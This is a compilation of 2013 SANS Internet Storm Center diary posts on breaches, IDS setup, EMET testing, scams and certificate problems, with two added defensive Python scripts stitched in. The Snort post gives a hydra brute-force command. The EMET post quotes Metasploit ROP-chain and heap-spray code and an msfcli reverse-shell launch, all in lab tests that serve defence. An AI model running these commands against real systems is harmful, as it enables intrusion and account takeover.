Published: 2013-05-30

Drupal.org & group.drupal.org password disclosure

The Drupal security team has identified a breach in their environment that disclosed passwords. As their notification (https://drupal.org/news/130529SecurityUpdate) states, most of the passwords were salted and hashed; older passwords were not (although common practice is to store the salt value in the same table as the password, so that might not actually help much). According to the update they are still investigating what else may have been accessed. If you have one of those accounts, happy password changing. If you use that password anywhere else (and of course you don't), you might want to change that whilst you are at it.

From the perspective of letting people know, I must say I'm quite impressed. They notified fairly early on, and they provide some details of the incident, steps to take, and actions they are taking. Of the breach notifications I have seen recently, this is one of the more complete and useful ones.


Mark H


Published: 2013-05-29

Running Snort on VMWare ESXi

This is a guest diary by Basil Alawi

One of the challenges that face security administrators is deploying an IDS in modern network infrastructure. Unlike hubs, switches don't forward every packet to every port in the switch. A SPAN port or a network TAP can be used as a workaround in a switched environment.

Fortunately, with VMware ESX/ESXi infrastructure we can configure a group of ports to see all network traffic traversing the virtual switch.

"Promiscuous mode is a security policy which can be defined at the virtual switch or portgroup level in vSphere ESX/ESXi. A virtual machine, Service Console or VMkernel network interface in a portgroup which allows use of promiscuous mode can see all network traffic traversing the virtual switch".

By default, the promiscuous mode policy is set to Reject.

To enable promiscuous mode:

  1. Log into the ESXi/ESX host or vCenter Server using the vSphere Client.
  2. Select the ESXi/ESX host in the inventory.
  3. Click the Configuration tab.
  4. In the Hardware section, click Networking.
  5. Click Properties of the virtual switch for which you want to enable promiscuous mode.
  6. Select the virtual switch or portgroup you wish to modify and click Edit.
  7. Click the Security tab.
  8. From the Promiscuous Mode dropdown menu, click Accept.

Performance issues:

Using the VMXNET 3 vNIC provides better performance than other vNIC types (Figure 1).

Figure 1(VMXNET 3)

Reserving memory and CPU resources is highly recommended, to make sure that the resources will be available when they are needed (Figure 2).

Figure 2(Reserved Memory)


The test lab setup


The test lab consists of VMware ESXi, Kali Linux, Security Onion and Metasploitable. ESXi 5.1 will be the host system and the Kali VM will be the attack server, while Metasploitable will be the victim and Security Onion will run the Snort instance (see Figure 3).

Figure 3 (Test Lab)

Test Lab Network Diagram


The Network Configuration

For this experiment the vSwitch has been configured with two port groups: the Virtual Machines port group, where promiscuous mode is left at the default value "Reject", and a second port group named Promiscuous, where promiscuous mode is set to "Accept" (see Figure 4).

Figure 4 (Vswitch Configuration)

The Security Onion VM has been configured with two network interfaces: eth0 for management, with an IP address, and eth1 without an IP address. eth0 is connected to the "VM Network" port group and eth1 is connected to the "Promiscuous" port group.




Testing Snort:


The first test is scanning the Metasploitable VM with Nmap by running and Snort detected this attempt successfully (Figure 5).




Figure 5 (Snort alerts for Nmap scans)


The second test is trying to brute force the Metasploitable root password using hydra (Figure 6):


hydra -l root -P passwordslist.txt ftp




Figure 6  (Hydra brute force alerts)


The third attempt was using Metasploit to exploit Metasploitable (see Figure 7).

Figure 7  (metasploit alerts)
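As an added example (not part of the guest diary), here is a small Python triage script for the kind of Snort alerts the three tests above produce, run over constructed alert_fast lines: it parses each alert, counts hits per signature, and flags the two traffic shapes seen in the lab, many hits on one service port from one source (what hydra produces) and one source touching many ports on one host (what an Nmap scan produces).

```python
import re
from collections import Counter, defaultdict

# Constructed sample output in Snort's "alert_fast" format. Rule messages and SIDs
# (local-rule range 1000000+) are made up for this example; they are not the rules
# that fired in the lab above.
SAMPLE_ALERTS = """\
05/29-14:03:11.102938  [**] [1:1000001:1] SCAN nmap TCP SYN probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.5:43210 -> 10.0.0.10:22
05/29-14:03:11.104211  [**] [1:1000001:1] SCAN nmap TCP SYN probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.5:43210 -> 10.0.0.10:80
05/29-14:03:11.105877  [**] [1:1000002:1] SCAN nmap XMAS probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.5:43211 -> 10.0.0.10:139
05/29-14:03:12.000104  [**] [1:1000003:1] ICMP PING nmap [**] [Classification: Misc activity] [Priority: 3] {ICMP} 10.0.0.5 -> 10.0.0.10
05/29-14:10:02.551200  [**] [1:1000010:2] FTP login failed repeatedly [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.5:50001 -> 10.0.0.10:21
05/29-14:10:02.781944  [**] [1:1000010:2] FTP login failed repeatedly [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.5:50002 -> 10.0.0.10:21
05/29-14:10:03.011532  [**] [1:1000010:2] FTP login failed repeatedly [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.5:50003 -> 10.0.0.10:21
05/29-14:10:03.240810  [**] [1:1000010:2] FTP login failed repeatedly [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.5:50004 -> 10.0.0.10:21
05/29-14:15:44.900001  [**] [1:1000020:1] POLICY outbound HTTP to update server [**] [Priority: 3] {TCP} 10.0.0.20:51888 -> 203.0.113.7:80
this line is not an alert and must be skipped
"""

# One regex for a whole alert_fast line. The Classification field is optional
# (Snort omits it for rules without a classtype) and ports are absent for ICMP.
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<cls>[^\]]+)\]\s+)?"
    r"\[Priority:\s+(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>\S+?)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>\S+?)(?::(?P<dport>\d+))?$"
)


def parse_alert(line):
    """Parse one alert_fast line into a dict; return None for lines that are not alerts."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    alert = m.groupdict()
    for key in ("gid", "sid", "rev", "prio"):
        alert[key] = int(alert[key])
    for key in ("sport", "dport"):            # None for protocols without ports (ICMP)
        alert[key] = int(alert[key]) if alert[key] is not None else None
    return alert


def parse_alerts(text):
    """Parse a whole alert file, silently skipping non-alert lines."""
    return [a for a in (parse_alert(ln) for ln in text.splitlines()) if a]


def count_by_signature(alerts):
    """Histogram of alerts by (sid, msg): which rules fire most."""
    return Counter((a["sid"], a["msg"]) for a in alerts)


def find_brute_force(alerts, min_hits=3):
    """Flag (src, dst, dport, msg) seen at least min_hits times: repeated hits by one
    signature on one service port from one source is the shape a hydra run leaves."""
    hits = Counter((a["src"], a["dst"], a["dport"], a["msg"]) for a in alerts if a["dport"])
    return {key: n for key, n in hits.items() if n >= min_hits}


def find_scanners(alerts, min_ports=3):
    """Flag (src, dst) pairs where the source touched at least min_ports distinct
    destination ports, whichever rules fired: the shape an Nmap port scan leaves."""
    ports = defaultdict(set)
    for a in alerts:
        if a["dport"] is not None:
            ports[(a["src"], a["dst"])].add(a["dport"])
    return {key: sorted(p) for key, p in ports.items() if len(p) >= min_ports}


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    for (sid, msg), n in count_by_signature(alerts).most_common():
        print(f"{n:4d}  sid {sid}  {msg}")
    for (src, dst, port, msg), n in find_brute_force(alerts).items():
        print(f"brute force? {src} -> {dst}:{port} hit {n}x by '{msg}'")
    for (src, dst), ports in find_scanners(alerts).items():
        print(f"port scan? {src} -> {dst} touched ports {ports}")
```

To run it against a real sensor, pass the contents of the alert_fast output file to parse_alerts() instead of the constructed sample.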


Published: 2013-05-27

Nuclear Scientists, Pandas and EMET Keeping Me Honest

Following is a guest post from TJ O'Connor, @ViolentPython, (http://www.linkedin.com/pub/tj-oconnor/43/37/81b), author of Violent Python  SANS Technical Institute graduate, and GSE .

What do Nuclear Scientists, Microsoft, and Metasploit have to do with keeping me honest? As everyone was celebrating the New Year in January of this year, my buddy Russ McRee posted some of my rambling thoughts to the Internet Storm Center about how EMET could protect against unknown future attacks (0-days). At the time, I tested Microsoft Enhanced Mitigation Experience Toolkit (EMET) 3.5 Tech Preview against CVE-2012-4792, found rigged on the Council of Foreign Relations website. It is fair to say that at that time I was working from a very biased perspective. The attack had already occurred and it was easy to look back in time and say EMET would have been successful in protecting against it. As every armchair quarterback knows, it is easy to look into the past. However, as the boastful and arrogant person I can sometimes be, I claimed EMET could stop future attacks against novel exploits (0-days) as well. On the podcast the following day, Johannes noted my work and effectively said only time will tell.
Well, fast forward four months. Chinese hackers from the Deep Panda group successfully injected a novel exploit into the Department of Labor's website on May 1st, 2013. Arguably, the attack was directed at scientists that likely work in nuclear weapons research, based on the content of the page.
Figure 1: Infected DOE Web Page as seen on May 1, 2003
Maintaining the shift of attacks seen in early 2012, the attackers continued their campaign of watering-hole attacks. Described in a report by Symantec , the term watering hole makes reference to a hunting technique. Rather than search for the herd throughout the forest, hunters sit idly by at the watering hole, knowing the animals will eventually come to drink. Applied to hacking, watering hole attacks apply the same concept: infect a place where you know your target will visit. In the case of the May 1st attack, Deep Panda hoped nuclear scientists would visit a page on dealing with possible exposure to nuclear materials.
After successful exploitation, the exploit downloaded a variant of the Poison Ivy Remote Access Toolkit (RAT) (http://www.poisonivy-rat.com), then checked for the presence of, and attempted to kill, popular anti-virus products (Avira, Bitdefender, AVG, ESET, Avira, Dr. Web, Sophos, F-Secure, Kaspersky). I'm making assumptions here, but at this point handlers from Deep Panda probably took over the target and began pillaging intellectual property and personal secrets belonging to the scientists. For further information about the attack, check out some great blog posts by Invincea and AlienVault.
Would EMET 3.5 have stopped the attack as I predicted four months earlier? Yes, I am fully aware EMET 4v Beta is available for download. But I am trying to remain honest to my words from January 1st. Let's see. The team at Metasploit reproduced the exploit used in the attack and posted the source.
Examining the source code of the Metasploit version of the exploit (dubbed cgenericelement_uaf since it is a use-after-free for CGenericElement), it appears the attack compromises only targets running Internet Explorer 8 on Windows XP SP3, Vista, Server 2003, or Windows 7 machines. Let's examine a couple of minor aspects of the exploit. First, the authors (Sinn3r, Juan Vazquez, and EMH) wrote the exploit to bypass Data Execution Protection using a ROP chain. This can be seen in Figure 2. In fact, it again uses the msvcrt.dll ROP chain.
rop_payload = ''
case t['Rop']
when :msvcrt
algin  = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''
if t.name == 'IE 8 on Windows XP SP3'
chain =
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN 
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
 rop_payload = chain + algin + payload.encoded
Figure 2: Msvcrt.dll ROP Chain Creation in ie_cgenericelement_uaf Exploit
Next, the authors used a newly developed Mstime No-Spray Technique to place the encoded payload into the heap. What’s interesting to note is that the new technique for placing shellcode into the heap was only integrated into the Metasploit Framework on April 1st, 2013 by wchen. (https://gist.github.com/wchen-r7/ac29eb40fb33ddb5ab29). Using the CTIMEAnimationBase in Mstime, the technique allocates an array of pointers to controllable strings. As this exploit demonstrates, this only works against Internet Explorer 8 or prior, since IE 9 does not support the function in Mstime. 
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
Figure 3: Mstime No-Spray Technique in ie_cgenericelement_uaf Exploit
So if you put the pieces together, we have a novel exploit (i.e., an exploit without a signature), use of the msvcrt.dll ROP chain, a novel method for placing shellcode into the heap (novel by the standards of EMET 3.5) and some shellcode to execute the Meterpreter. Let's fire up the exploit and browse to it. Figure 4 shows how to successfully start the exploit from the Metasploit framework. Here we will stand up an instance of the exploit on a web server on TCP port 8080, and have our payload (the Meterpreter) call back on TCP port 4444.
msfcli exploit/windows/browser/ie_cgenericelement_uaf SRVHOST= SRVPORT=8080 payload=windows/Meterpreter/reverse_tcp LPORT=4444 LHOST= E
Figure 4: Launching the ie_cgenericelement_uaf Exploit From Metasploit
We browse the new target at with a victim Internet Explorer 8 on an unpatched Windows XP SP3 and see that the exploit successfully executes its payload, establishing a Meterpreter session on the victim.
Figure 5: Successful Compromise Using ie_cgenericelement_uaf Exploit
OK, so we know the exploit works. Now let's install EMET 3.5 and repeat the exercise. We'll begin by enabling all the protection mechanisms that EMET provides.
Figure 6: Enabling All EMET Protection Mechanisms For Internet Explorer
With EMET 3.5 installed, we attempt the exploit again and EMET 3.5 immediately detects the Stack Pivot included in the msvcrt.dll ROP chain. 
Figure 7: Stack Pivot Detected By EMET 3.5
Next, we disable the StackPivot detection and protection mechanism in EMET and repeat. This time, the exploit successfully begins the ROP chain but is stopped at 0x77c1110c when the chain attempts to call VirtualAlloc() in an attempt to bypass Data Execution Protection (DEP). EMET 3.5 uses a mechanism to detect who is calling VirtualAlloc() and does not permit it to be called outside of the kernel.
Figure 8: VirtualAlloc() Caller Checking in EMET 3.5
OK, we disable the CallerChecking functionality and repeat. This time, the ROP chain again fails when SimExecFlow detects ROP gadgets in use. SimExecFlow simulates the execution flow after the return address and detects subsequent ROP gadgets. Essentially, EMET 3.5 looks at the stack, sees a series of addresses that each point to a couple of instructions followed by a RET-like instruction, and identifies the ROP chain. OK, so this won't work.
Figure 9: SimExecFlow Detecting ROP Gadgets in Use
We disable SimExecFlow checking and run the exploit again. This time, the exploit steps the entire way through our ROP chain and successfully places our shellcode into a region of executable memory. However, as soon as the shellcode begins to execute we are presented with a new error message. 
Figure 10: Export Address Table Access Filtering in EMET 3.5
We are reminded that in order to do anything useful with shellcode (downloading a stager, adding a registry key, adding a user), we need to make calls to the Windows API. By accessing the export address table, shellcode can determine the location of useful APIs (most commonly in kernel32.dll or ntdll.dll). Without accessing the export address table, it proves difficult to find the location of specific required API calls. And thus, EMET 3.5 successfully detects this behavior and stops the shellcode from executing further. So with several protection mechanisms disabled, EMET completely misses the exploit but catches and stops its payload.
So at this point, I'm pretty happy. EMET has kept me honest against Deep Panda and their threat towards nuclear scientists. What I said four months earlier, that EMET 3.5 would prevent novel attacks, held very true four months after I said it. But there is a small caveat. Remember that No-Spray method I mentioned? EMET 3.5 failed to detect it in usage. In fact, repeating the exercise with EMET 4v Beta also missed the No-Spray. Feature request, Microsoft?



Published: 2013-05-24

UDP port 1434 directed attack to AS13489 IP ranges

We have seen today a big rise in incoming packets of what appears to be SQL Slammer attacks. Some of the detected packets are:

Suspect packet #1

Malicious packet 2

Malicious packet 3

We have seen a sustained rate of about 25 Mbps on many nodes inside AS13489 and AS27989. Some very old SQL servers have been compromised, and Internet connectivity has suffered as well: browsing is very slow.

Have you seen something like this today on your AS? Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org


Published: 2013-05-23


Volatility is a Python framework for performing memory forensics. If you haven't tried it yet, I highly recommend it. The Month of Volatility Plugins II is on! As announced here: http://volatility-labs.blogspot.ca/2013/05/whats-happening-in-world-of-volatility.html Volatility 2.3 is entering beta and the second MoVP (Month of Volatility Plugins) has started and is now in its second installment. Some very exciting new stuff:

1.1 - Mach-O Address Space
1.2 - VirtualBox ELF64 Core Dumps
1.3 - VMware Snapshot and Saved State Analysis
1.4 - New HPAK Address Space
1.5 - ARM Address Space (Volatility and Android / Mobile)
2.1 - RSA Private Keys and Certificates
2.2 - Unloaded Windows Kernel Modules

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule



Published: 2013-05-22

Privilege escalation, why should I care?

In my day job I spend about 90% of my time on the red team, performing vulnerability assessment and penetration testing. The rest is spent on threat research, incident response, and digital forensics. Interacting with clients as a consultant I often hear what I term 'interesting' responses. When a penetration tester calls something interesting you should probably pay attention :)

The IDS only listens external to the firewall? SharePoint is directly exposed to the Internet? The WAF protects against attacks therefore we don't have to fix the application? The VMs are all physically on the same host? The DMZ and the internal VLAN are physically on the same switch? You don't bother with privilege escalation patches? All quite interesting.

One of the responses I have heard multiple times is that privilege escalation vulnerabilities are a low priority because they require the attacker to have local access, meaning that this would be very difficult to pull off, and therefore we don't have to worry about it. This also assumes that every single account holder is 100% gruntled all of the time, and that nobody ever makes a mistake. Meaning that we can trust everyone who accesses our networks and applications. Which I also find to be 'interesting' :)

There are multiple types of privilege attacks. The first is privilege escalation, where someone who has valid credentials or a means to access a network or application can raise their level of access to a more privileged level. Like getting root on a Unix system, for example, or becoming Domain Admin before lunch on day 1, or assuming a higher role within an application. Impersonation attacks are similar; however, they entail becoming a different user, often with the same level of privilege, but with way more money in their account :) which soon finds its way to a non-extradition treaty country.

If the major difference between a remote exploit and a local one is that a network connection is required for the former and not for the latter, does this mean that local privilege escalation attacks cannot be performed across the network? Actually, no. If an attacker can gain access to a system through a client-side exploit, they may then effectively become the local user, and escalate to Local System. Local System privileges on a Windows computer are just a hop, skip, and a jump away from Domain Administrator.

In a recent discussion about the priority to be assigned to a patch, one comment was "It's only a privilege escalation!". Yes, you are correct, and that is an interesting statement, was my response.

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule


Published: 2013-05-21

Moore, Oklahoma tornado charitable organization scams, malware, and phishing

I find it sad that in times when people are facing disaster, when many have died, others are missing, and the survivors face having lost everything, there are scumbags who will try to take advantage. Be very wary of any charity that is raising funds for victims of any disaster, particularly one that has not been around for very long. There are many legitimate charities; I would recommend sticking to ones you are already familiar with. The American Red Cross, for example, has been around for a long time, does amazing work, and is always in need of funding. They are just one example of a well established charity that does good work and is already involved in helping out in Moore, Oklahoma.

Routine monitoring of newly registered domain names shows a number of brand new ones that contain words like Oklahoma, Moore, tornado, recovery, help, assistance, and similar. I am certain that a number are registered by well meaning people; however, I am equally sure that many are fake or scams. It does not take long for any recent newsworthy topic to become the subject line of phishing, malware, and scams.

Another handler remarked that the new trend seems to be crowd funding, hopefully the money raised will make its way to the charity where it belongs.

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule


Published: 2013-05-20

Safe - Tools, Tactics and Techniques

Trend Micro published a report last week on a spear-phishing email campaign whose messages contain a malicious attachment exploiting a Microsoft Office vulnerability (CVE-2012-0158).

This paper identified specific targets:

  • Government ministries
  • Technology companies
  • Media outlets
  • Academic research institutions
  • Nongovernmental organizations

According to the report, "While we have yet to determine the campaign’s total number of victims, it appears that nearly 12,000 unique IP addresses spread over more than 100 countries were connected to two sets of command-and-control (C&C) infrastructures related to Safe.[1]" Another fact of interest is that the author of the malware is probably a professional software developer who reused legitimate source code from an Internet services company. Based on the information collected, they found "One key indicator that can be used to detect this network communication is the user-agent, Fantasia."[1] Additional information is available in the report.

If you have collected some malware matching this description, we would be interested to get some samples. You can submit them via our contact form.

[1] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf
[2] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2013-05-20

Ubuntu Package available to submit firewall logs to DShield

I put together a simple .deb package to install our DShield iptables client on Ubuntu. The package is our standard Perl client to submit iptables logs, but it is pre-configured for Ubuntu 12.04 LTS. It will submit IPv4 as well as IPv6 logs. Please give it a try and let me know if you run into any issues. For details, see


Use our contact form for feedback, or send it directly to me at jullrich - at - sans.edu

The client will install the Perl script in /opt/dshield, and all configuration files in /etc/dshield. It will also add an hourly cron job to check /var/log/ufw.log for new logs and mail them to DShield. All parameters can still be further configured via /etc/dshield/dshield.cnf.

To submit logs, we recommend you set up an account. But if you would like to submit anonymous reports, just use "0" as the userid.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-19

Port 51616 - Got Packets?

We're looking for any info or packets that target port 51616. After witnessing a spike yesterday on his network and checking that our port data [1] corroborated his event, Andrew has written in asking what we know.

The most useful snapshot of port activity can be seen in this graph image. I ran the graphs as far back as 2006 and nothing more significant was illustrated. The image below highlights yesterday's events as well as a more curious spike back in March. These counts do not seem very significant at first look, but they could clearly be telling us something.

Port 51616 - Mar 2013 to May 2013

So drop us a comment to share what you know. We're interested in attributing this traffic to something useful.

[1] https://isc.sans.edu/port.html?port=51616



Published: 2013-05-17

SSL: Another reason not to ignore IPv6

Currently, many public web sites that allow access via IPv6 do so via proxies. This is seen as the "quick fix", as it requires minimum changes to the site itself. As far as the web application is concerned, all incoming traffic is IPv4. 

The most obvious issue here is logging: the application only "sees" the proxy's IP address, unless it inspects headers added by the proxy, which will now point to (unreadable?) IPv6 addresses.

But there is another issue: SSL certificates. If only IPv6 connections are passed via the proxy, you will end up with two different certificates: one for the proxy, and one for the web application (or the IPv4 proxy). It may also happen that the IPv6 and IPv4 sites are considered two different hosts on the web server, requiring distinct configurations.

For example, at this point, "www.socialsecurity.gov" uses two different certificates, one for IPv6 and one for IPv4. The IPv6 certificate is expired, while the IPv4 certificate is valid. This is particularly painful as some simple command line tools, like "openssl s_client", are still not able to work over IPv6. For my test, I used gnutls-cli, which works similarly to openssl s_client but supports IPv6.

Excerpt from the result:


gnutls-cli -p 443 --x509cafile /opt/local/share/ncat/ca-bundle.crt www.socialsecurity.gov
Processed 291 CA certificate(s).
Resolving 'www.socialsecurity.gov'...
Connecting to '2001:1930:c01::aaaa:443'...
- subject `C=US,ST=maryland,L=baltimore,O=social security administration,OU=diias,OU=Terms of use at www.verisign.com/rpa (c)05,CN=www.socialsecurity.gov', issuer `C=US,O=VeriSign\, Inc.,OU=VeriSign Trust Network,OU=Terms of use at https://www.verisign.com/rpa (c)10,CN=VeriSign Class 3 Secure Server CA - G3', RSA key 1024 bits, signed using RSA-SHA1, activated `2012-04-05 00:00:00 UTC', expires `2013-04-29 23:59:59 UTC', SHA-1 fingerprint `3286afd908f256947b396dbae88d37b111c9aaaf'
- Status: The certificate is NOT trusted. The certificate chain uses expired certificate. 
*** Verifying server certificate failed...
*** Fatal error: Error in the certificate.
*** Handshake has failed
GnuTLS error: Error in the certificate.

Next, let's try IPv4. A disadvantage of gnutls-cli is that you are not able to force an IPv4 connection, so I will just fall back to openssl here:

$ openssl s_client -connect www.socialsecurity.gov:443 -CAfile /opt/local/share/ncat/ca-bundle.crt
subject=/C=US/ST=maryland/L=baltimore/O=social security administration/OU=diias/OU=Terms of use at www.verisign.com/rpa (c)05/CN=www.socialsecurity.gov
issuer=/C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=Terms of use at https://www.verisign.com/rpa (c)10/CN=VeriSign Class 3 Secure Server CA - G3
And after saving the certificate to a file:
$ openssl x509 -in /tmp/ssa.gov -text
        Not Before: Apr 22 00:00:00 2013 GMT
        Not After : Apr 30 23:59:59 2017 GMT
        Subject: C=US, ST=maryland, L=baltimore, O=social security administration, OU=diias, OU=Terms of use at www.verisign.com/rpa (c)05, CN=www.socialsecurity.gov
So in short: two different certificates for the same host name. This isn't always bad, and not uncommon. But all the certificates have to be valid!
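As an added example (not part of the diary), the check above can be scripted so that both address families of one host are tested in a single run: the Python below handshakes over IPv4 and over IPv6 separately (sending SNI for the host name), reads notBefore/notAfter straight out of the DER certificate with a minimal stdlib-only parser, and reports certificates outside their validity window as well as endpoints that present different certificates. The host name www.socialsecurity.gov is the diary's example; the constructed_cert_der() helper builds a certificate-shaped blob purely for offline testing of the parser.

```python
import hashlib, socket, ssl, sys
from datetime import datetime, timezone

def utc_dt(y, mo, d, h=0, mi=0, s=0):
    """Timezone-aware UTC datetime (for sample data and comparisons)."""
    return datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc)

def _der_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                                   # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def _der_time(tag, raw):
    """Decode UTCTime (tag 0x17, YYMMDD...) or GeneralizedTime (0x18, YYYYMMDD...)."""
    fmt = "%y%m%d%H%M%SZ" if tag == 0x17 else "%Y%m%d%H%M%SZ"
    return datetime.strptime(raw.decode("ascii"), fmt).replace(tzinfo=timezone.utc)

def cert_validity(der):
    """Return (notBefore, notAfter) of a DER-encoded X.509 certificate, stdlib only."""
    _, cert, _ = _der_tlv(der, 0)                  # Certificate SEQUENCE
    _, tbs, _ = _der_tlv(cert, 0)                  # tbsCertificate SEQUENCE
    tag, _, pos = _der_tlv(tbs, 0)                 # version [0] (optional) or serialNumber
    if tag == 0xA0:
        _, _, pos = _der_tlv(tbs, pos)             # serialNumber
    _, _, pos = _der_tlv(tbs, pos)                 # signature AlgorithmIdentifier
    _, _, pos = _der_tlv(tbs, pos)                 # issuer Name
    _, validity, _ = _der_tlv(tbs, pos)            # validity SEQUENCE { notBefore, notAfter }
    tag_nb, nb, pos = _der_tlv(validity, 0)
    tag_na, na, _ = _der_tlv(validity, pos)
    return _der_time(tag_nb, nb), _der_time(tag_na, na)

def fetch_cert(host, family, port=443, timeout=10):
    """Handshake with the first address of the given family (AF_INET or AF_INET6),
    sending SNI for host; return (address, sha1 fingerprint, notBefore, notAfter).
    Verification is disabled on purpose so an expired certificate is still returned."""
    addr = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM)[0][4]
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.socket(family, socket.SOCK_STREAM) as raw:
        raw.settimeout(timeout)
        raw.connect(addr)
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    nb, na = cert_validity(der)
    return addr[0], hashlib.sha1(der).hexdigest(), nb, na

def assess(records, now):
    """records: (label, fingerprint, notBefore, notAfter) per endpoint. Returns
    findings: certificates outside their validity window at time now, plus a
    note when the endpoints do not all present the same certificate."""
    findings = []
    for label, fp, nb, na in records:
        if now < nb:
            findings.append(f"{label}: certificate {fp} not valid before {nb:%Y-%m-%d}")
        elif now > na:
            findings.append(f"{label}: certificate {fp} expired on {na:%Y-%m-%d}")
    if len({fp for _, fp, _, _ in records}) > 1:
        findings.append("IPv4 and IPv6 endpoints present different certificates")
    return findings

def _der(tag, body):
    """Encode one DER TLV (short or long-form length)."""
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def constructed_cert_der(not_before, not_after):
    """Constructed test data: a blob with the tbsCertificate layout up to the validity
    field. It is NOT a real certificate; it exists only to exercise cert_validity()."""
    utc = lambda d: _der(0x17, d.strftime("%y%m%d%H%M%SZ").encode())
    tbs = (_der(0xA0, _der(0x02, b"\x02"))                                    # version v3
           + _der(0x02, b"\x01")                                              # serialNumber
           + _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b"))  # sha256WithRSAEncryption
           + _der(0x30, b"")                                                  # issuer (empty Name)
           + _der(0x30, utc(not_before) + utc(not_after)))                    # validity
    return _der(0x30, _der(0x30, tbs))

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "www.socialsecurity.gov"
    records = []
    for label, family in (("IPv4", socket.AF_INET), ("IPv6", socket.AF_INET6)):
        try:
            ip, fp, nb, na = fetch_cert(host, family)
            print(f"{label} {ip}: sha1 {fp}, valid {nb:%Y-%m-%d} to {na:%Y-%m-%d}")
            records.append((label, fp, nb, na))
        except OSError as exc:                     # no address of this family, or no connection
            print(f"{label}: skipped ({exc})")
    for line in assess(records, datetime.now(timezone.utc)) or ["no problems found"]:
        print(line)
```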

------ Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter


Published: 2013-05-17

e-netprotections.su ?


Like with .biz, I sometimes have the impression that .su and .cc could be sinkholed in their entirety, because the bad domains seem to vastly outnumber whatever (if any) good is running under these TLDs as well.

Earlier today, ISC reader Michael contacted us with information that several PCs on his network had started to communicate with iestats.cc, emstats.su, ehistats.su, e-protections.su and a couple other domains. I was pretty sure that I had seen the latter domain on an earlier occasion in a malware outbreak, but I couldn't find it in our records .. until I only searched for "e-protections", and found e-protections.cc. This domain had been implicated back in October 2012 in a malware spree that was linked to the nasty W32.Caphaw, a backdoor/information stealer. The similarity of the names was too much of a coincidence, and it meant bad news for Michael.

Looking at what was captured by some of our network sensors allowed us to reconstruct a (partial) picture of the IPs and ASNs involved in today's malware wave:

Domain IP AS Provider Country
ppetoc.iestats.cc 30517 Great Lakes Comnet USA
ppetoc.iestats.cc 8972 PlusServer Intergenia AG Germany
ppetoc.iestats.cc 40676 Psychz Networks USA
